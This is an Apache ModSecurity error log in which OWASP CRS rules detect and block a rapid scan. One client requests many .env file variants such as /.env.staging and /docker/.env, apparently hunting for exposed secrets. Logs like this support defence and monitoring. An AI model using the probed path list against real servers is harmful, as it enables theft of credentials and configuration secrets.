[Mon May 11 22:01:48.828555 2026] [security2:error] [pid 1590352:tid 1590414] [client 193.111.117.35:21304] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.env.staging"] [unique_id "agI1rK1q0G_aXAqWauTyMAAAAJY"]
[Mon May 11 22:01:48.828570 2026] [security2:error] [pid 1601130:tid 1601168] [client 193.111.117.35:21332] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.test.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.env.test.local"] [unique_id "agI1rHEgAO_835W6c1mNjAAAAFI"]
[Mon May 11 22:01:48.828768 2026] [security2:error] [pid 1588898:tid 1588922] [client 193.111.117.35:21320] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.env.staging.local"] [unique_id "agI1rKFW67LJTsgN3jQETQAAABg"]
[Mon May 11 22:01:48.828778 2026] [security2:error] [pid 1601130:tid 1601168] [client 193.111.117.35:21332] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.env.test.local"] [unique_id "agI1rHEgAO_835W6c1mNjAAAAFI"]
[Mon May 11 22:01:48.828782 2026] [security2:error] [pid 1590352:tid 1590414] [client 193.111.117.35:21304] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.env.staging"] [unique_id "agI1rK1q0G_aXAqWauTyMAAAAJY"]
[Mon May 11 22:01:48.829020 2026] [security2:error] [pid 1605480:tid 1605536] [client 193.111.117.35:21276] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.env.local"] [unique_id "agI1rB2Cvzd_nyNfUm_2KgAAAQ4"]
[Mon May 11 22:01:48.829185 2026] [security2:error] [pid 1605480:tid 1605536] [client 193.111.117.35:21276] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.env.local"] [unique_id "agI1rB2Cvzd_nyNfUm_2KgAAAQ4"]
[Mon May 11 22:01:48.829046 2026] [security2:error] [pid 1534836:tid 1534894] [client 193.111.117.35:21364] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.1"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.env.1"] [unique_id "agI1rNeaRXe5lR8y0ZOs4QAAAVc"]
[Mon May 11 22:01:48.829591 2026] [security2:error] [pid 1534836:tid 1534894] [client 193.111.117.35:21364] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.env.1"] [unique_id "agI1rNeaRXe5lR8y0ZOs4QAAAVc"]
[Mon May 11 22:01:48.830185 2026] [security2:error] [pid 1605480:tid 1605536] [client 193.111.117.35:21276] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agI1rB2Cvzd_nyNfUm_2KgAAAQ4"]
[Mon May 11 22:01:48.831725 2026] [security2:error] [pid 1601130:tid 1601168] [client 193.111.117.35:21332] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agI1rHEgAO_835W6c1mNjAAAAFI"]
[Mon May 11 22:01:48.833176 2026] [security2:error] [pid 1534836:tid 1534894] [client 193.111.117.35:21364] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agI1rNeaRXe5lR8y0ZOs4QAAAVc"]
[Mon May 11 22:01:48.833962 2026] [security2:error] [pid 1590352:tid 1590414] [client 193.111.117.35:21304] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agI1rK1q0G_aXAqWauTyMAAAAJY"]
[Mon May 11 22:01:48.835032 2026] [security2:error] [pid 1601130:tid 1601151] [client 193.111.117.35:21534] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.env.bak~"] [unique_id "agI1rHEgAO_835W6c1mNjQAAAEE"]
[Mon May 11 22:01:48.835105 2026] [security2:error] [pid 1534836:tid 1534891] [client 193.111.117.35:21566] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.docker/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.docker/.env"] [unique_id "agI1rNeaRXe5lR8y0ZOs4gAAAVQ"]
[Mon May 11 22:01:48.835208 2026] [security2:error] [pid 1601130:tid 1601151] [client 193.111.117.35:21534] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.env.bak~"] [unique_id "agI1rHEgAO_835W6c1mNjQAAAEE"]
[Mon May 11 22:01:48.835282 2026] [security2:error] [pid 1588898:tid 1588914] [client 193.111.117.35:21498] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.toml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.env.toml"] [unique_id "agI1rKFW67LJTsgN3jQETgAAAA8"]
[Mon May 11 22:01:48.835315 2026] [security2:error] [pid 1590352:tid 1590395] [client 193.111.117.35:21522] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.old~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.env.old~"] [unique_id "agI1rK1q0G_aXAqWauTyMQAAAIM"]
[Mon May 11 22:01:48.835406 2026] [security2:error] [pid 1534836:tid 1534891] [client 193.111.117.35:21566] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.docker/.env"] [unique_id "agI1rNeaRXe5lR8y0ZOs4gAAAVQ"]
[Mon May 11 22:01:48.835431 2026] [security2:error] [pid 1588898:tid 1588914] [client 193.111.117.35:21498] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.env.toml"] [unique_id "agI1rKFW67LJTsgN3jQETgAAAA8"]
[Mon May 11 22:01:48.835459 2026] [security2:error] [pid 1590352:tid 1590395] [client 193.111.117.35:21522] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.env.old~"] [unique_id "agI1rK1q0G_aXAqWauTyMQAAAIM"]
[Mon May 11 22:01:48.835671 2026] [security2:error] [pid 1588898:tid 1588922] [client 193.111.117.35:21320] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agI1rKFW67LJTsgN3jQETQAAABg"]
[Mon May 11 22:01:48.836619 2026] [security2:error] [pid 1588898:tid 1588909] [client 193.111.117.35:21340] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.copy"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.env.copy"] [unique_id "agI1rKFW67LJTsgN3jQETwAAAAo"]
[Mon May 11 22:01:48.836769 2026] [security2:error] [pid 1588898:tid 1588909] [client 193.111.117.35:21340] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.env.copy"] [unique_id "agI1rKFW67LJTsgN3jQETwAAAAo"]
[Mon May 11 22:01:48.836896 2026] [security2:error] [pid 1601130:tid 1601160] [client 193.111.117.35:21412] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.template"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.env.template"] [unique_id "agI1rHEgAO_835W6c1mNjgAAAEo"]
[Mon May 11 22:01:48.836904 2026] [security2:error] [pid 1534836:tid 1534883] [client 193.111.117.35:21476] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.yaml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.env.yaml"] [unique_id "agI1rNeaRXe5lR8y0ZOs4wAAAUw"]
[Mon May 11 22:01:48.837097 2026] [security2:error] [pid 1601130:tid 1601160] [client 193.111.117.35:21412] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.env.template"] [unique_id "agI1rHEgAO_835W6c1mNjgAAAEo"]
[Mon May 11 22:01:48.837116 2026] [security2:error] [pid 1534836:tid 1534883] [client 193.111.117.35:21476] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.env.yaml"] [unique_id "agI1rNeaRXe5lR8y0ZOs4wAAAUw"]
[Mon May 11 22:01:48.837204 2026] [security2:error] [pid 1590352:tid 1590399] [client 193.111.117.35:21436] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env_dev"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.env_dev"] [unique_id "agI1rK1q0G_aXAqWauTyMgAAAIc"]
[Mon May 11 22:01:48.837314 2026] [security2:error] [pid 1605480:tid 1605537] [client 193.111.117.35:21546] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /docker/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/docker/.env"] [unique_id "agI1rB2Cvzd_nyNfUm_2KwAAAQ8"]
[Mon May 11 22:01:48.837435 2026] [security2:error] [pid 1590352:tid 1590399] [client 193.111.117.35:21436] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.env_dev"] [unique_id "agI1rK1q0G_aXAqWauTyMgAAAIc"]
[Mon May 11 22:01:48.837608 2026] [security2:error] [pid 1605480:tid 1605537] [client 193.111.117.35:21546] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/docker/.env"] [unique_id "agI1rB2Cvzd_nyNfUm_2KwAAAQ8"]
[Mon May 11 22:01:48.839315 2026] [security2:error] [pid 1590352:tid 1590405] [client 193.111.117.35:21372] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.2"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.env.2"] [unique_id "agI1rK1q0G_aXAqWauTyMwAAAI0"]
[Mon May 11 22:01:48.839465 2026] [security2:error] [pid 1590352:tid 1590405] [client 193.111.117.35:21372] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.env.2"] [unique_id "agI1rK1q0G_aXAqWauTyMwAAAI0"]
[Mon May 11 22:01:48.839579 2026] [security2:error] [pid 1605480:tid 1605537] [client 193.111.117.35:21546] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agI1rB2Cvzd_nyNfUm_2KwAAAQ8"]
[Mon May 11 22:01:48.839746 2026] [security2:error] [pid 1534836:tid 1534884] [client 193.111.117.35:21402] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.sample"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.env.sample"] [unique_id "agI1rNeaRXe5lR8y0ZOs5AAAAU0"]
[Mon May 11 22:01:48.839808 2026] [security2:error] [pid 1605480:tid 1605538] [client 193.111.117.35:21346] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.saved"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.env.saved"] [unique_id "agI1rB2Cvzd_nyNfUm_2LAAAARA"]
[Mon May 11 22:01:48.839932 2026] [security2:error] [pid 1534836:tid 1534884] [client 193.111.117.35:21402] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.env.sample"] [unique_id "agI1rNeaRXe5lR8y0ZOs5AAAAU0"]
[Mon May 11 22:01:48.839960 2026] [security2:error] [pid 1605480:tid 1605538] [client 193.111.117.35:21346] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.env.saved"] [unique_id "agI1rB2Cvzd_nyNfUm_2LAAAARA"]
